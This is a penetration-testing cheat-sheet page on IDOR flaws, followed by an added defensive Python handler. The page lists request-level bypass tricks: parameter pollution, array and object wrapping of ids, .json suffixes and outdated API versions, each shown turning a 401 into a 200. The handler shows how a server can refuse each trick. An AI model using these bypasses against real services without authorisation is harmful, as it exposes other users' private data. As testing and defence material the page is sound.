Pentest Book

IDOR

Basics

Check for valuable words:

```
{regex + perm} id
{regex + perm} user
{regex + perm} account
{regex + perm} number
{regex + perm} order
{regex + perm} no
{regex + perm} doc
{regex + perm} key
{regex + perm} email
{regex + perm} group
{regex + perm} profile
{regex + perm} edit
```

Bypasses

Add parameters onto the endpoint. For example, if there was:

```
GET /api_v1/messages --> 401
vs
GET /api_v1/messages?user_id=victim_uuid --> 200
```
HTTP parameter pollution:

```
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK

GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
```
Add .json to the endpoint, if it is built in Ruby!

```
/user_data/2341 --> 401 Unauthorized
/user_data/2341.json --> 200 OK
```
Test on outdated API versions:

```
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
```
Wrap the ID with an array:

```
{"id":111} --> 401 Unauthorized
{"id":[111]} --> 200 OK
```
Wrap the ID with a JSON object:

```
{"id":111} --> 401 Unauthorized
{"id":{"id":111}} --> 200 OK
```
JSON parameter pollution:

```
POST /api/get_profile
Content-Type: application/json
{"user_id":<legit_id>,"user_id":<victim's_id>}
```
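The defender's counterpart to the bypasses above, as an added example that is not part of the Pentest Book page: a Python handler that normalizes the object reference before any lookup, so parameter pollution, array or object wrapping, format suffixes and old version prefixes all reach the same ownership check. The store `MESSAGES`, the route pattern, the functions `get_message`, `list_messages` and `is_denied`, and the sample ids are constructed for this illustration, not taken from any real API.

```python
import json
import re
from urllib.parse import parse_qsl

# Constructed sample store: message id -> owner username.
MESSAGES = {111: "alice", 222: "bob"}

# One route pattern for every API version and format suffix, so /v1/...,
# /api_v1/... and ...111.json all land on the same (current) check below.
PATH_RE = re.compile(
    r"^/(?:v\d+/|api_v\d+/)?messages(?:/(?P<id>\d+))?(?:\.(?:json|xml))?$"
)

# Filters the list endpoint accepts; user_id is deliberately not among them.
ALLOWED_LIST_FILTERS = {"limit"}


class AuthzError(Exception):
    """The reference could not be resolved to one object the caller owns."""


def _query_id(query_string):
    """Single numeric id from the query string, or None.

    parse_qsl keeps every occurrence, so id=A&id=B is seen as two values and
    the array spelling id[]= is seen as a distinct key; both are refused.
    """
    pairs = parse_qsl(query_string, keep_blank_values=True)
    if any(k == "id[]" for k, _ in pairs):
        raise AuthzError("array-style id is not accepted")
    hits = [v for k, v in pairs if k == "id"]
    if not hits:
        return None
    if len(hits) > 1 or not hits[0].isdigit():
        raise AuthzError("id must appear once as a plain number")
    return int(hits[0])


def _body_id(raw_body):
    """Single integer "id" from a JSON body, or None.

    json.loads would silently keep the last duplicate key; object_pairs_hook
    exposes all of them. {"id":[111]} and {"id":{"id":111}} are refused.
    """
    if not raw_body:
        return None
    pairs = json.loads(raw_body, object_pairs_hook=lambda p: p)
    hits = [v for k, v in pairs if k == "id"]
    if not hits:
        return None
    if len(hits) > 1 or isinstance(hits[0], bool) or not isinstance(hits[0], int):
        raise AuthzError("id must appear once as a plain integer")
    return hits[0]


def get_message(user, path, query_string="", raw_body=b""):
    """Resolve the referenced message and enforce ownership.

    user is the authenticated session identity; nothing the client sends
    replaces it. Raises AuthzError (map to 401/403) on any irregularity.
    """
    m = PATH_RE.match(path)
    if m is None:
        raise AuthzError("unknown route")
    candidates = {
        int(m.group("id")) if m.group("id") else None,
        _query_id(query_string),
        _body_id(raw_body),
    }
    candidates.discard(None)
    if len(candidates) != 1:
        raise AuthzError("exactly one object id is required")
    obj_id = candidates.pop()
    owner = MESSAGES.get(obj_id)
    if owner != user:
        raise AuthzError("caller does not own this object")
    return {"id": obj_id, "owner": owner}


def list_messages(user, query_string=""):
    """List endpoint: the owner filter is always the session user.

    A client-supplied user_id (plain, duplicated or user_id[]) is dropped by
    the allow-list, so ?user_id=victim still lists only the caller's own rows.
    """
    pairs = parse_qsl(query_string, keep_blank_values=True)
    filters = {k: v for k, v in pairs if k in ALLOWED_LIST_FILTERS}
    ids = sorted(mid for mid, owner in MESSAGES.items() if owner == user)
    if filters.get("limit", "").isdigit():
        ids = ids[: int(filters["limit"])]
    return ids


def is_denied(user, path, query_string="", raw_body=b""):
    """True when get_message refuses the request."""
    try:
        get_message(user, path, query_string, raw_body)
    except AuthzError:
        return True
    return False


if __name__ == "__main__":
    print(get_message("alice", "/api_v1/messages/111"))              # owner: allowed
    print(is_denied("bob", "/api_v1/messages/111.json"))            # suffix trick
    print(is_denied("bob", "/api_v1/messages", "id=222&id=111"))    # pollution
    print(list_messages("alice", "user_id=bob"))                    # own rows only
```

The point of the design is that every trick on the page is a disagreement between how the client spelled the reference and how the server parsed it; collecting all candidate ids into a set and insisting on exactly one plain integer removes that gap, and taking the caller identity from the session rather than from `user_id` removes the rest.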
Last modified 1yr ago